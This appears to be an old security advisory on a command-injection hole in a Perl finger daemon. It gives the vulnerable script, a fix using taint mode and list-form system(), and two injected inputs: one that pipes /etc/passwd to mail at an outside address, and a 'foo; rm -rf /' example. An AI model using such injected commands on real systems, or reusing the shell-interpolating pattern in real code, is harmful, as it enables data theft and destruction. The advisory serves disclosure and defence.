COMMAND

    fingerd

SYSTEMS AFFECTED

    Systems running this finger described below

PROBLEM

    Chris Terry posted about the perl fingerd currently posted at:

        ftp://sunsite.unc.edu/pub/Linux/network/finger/daemons

        #!/usr/bin/perl
        # fingerd - a simple finger daemon
        $user = <STDIN>;
        chop($user);
        chop($user);
        if(-e "/usr/lib/finger/$user"){
            system "/usr/bin/perl /usr/lib/finger/$user";
        } else {
            system "/usr/bin/perl /usr/lib/finger/default $user";
        }

	So, we have following:

        [root@batleh perl-finger]# ./fingerd
        |cat /etc/passwd|mail you@your.host.com

SOLUTION

    If that fingerd were run with  taint checks on (i.e. #! perl  -T),
    then it wouldn't be such a huge  hole.  A better way to have  done
    it would be something like:

        #! /usr/bin/perl -T

        require 5;  # if you don't have it, upgrade already! :-)

        $ENV{PATH} = join ":", qw( /bin /usr/bin );

        $user = <STDIN>;
        chomp $user;

        if (-e "/usr/lib/finger/$user") {
            system "perl", "/usr/lib/finger/$user";
        }
        else {
            system "perl", "/usr/lib/finger/default", $user;
        }

    Note that passing a list  to system (or exec) bypasses  the shell,
    so even if $user eq 'foo; rm -rf /', there is no danger as far  as
    this script is concerned (it all depends on what those scripts  in
    /usr/lib are doing with their arguments).

    (If  you're  still  wondering  about  taint  checks, -T is just an
    instruction to  perl telling  it that  it shouldn't  let data from
    the  outside  world  come  in  and  be  a  part of operations that
    affect  the  outside  world  without  first  being  subject  to  a
    thorough looking over.)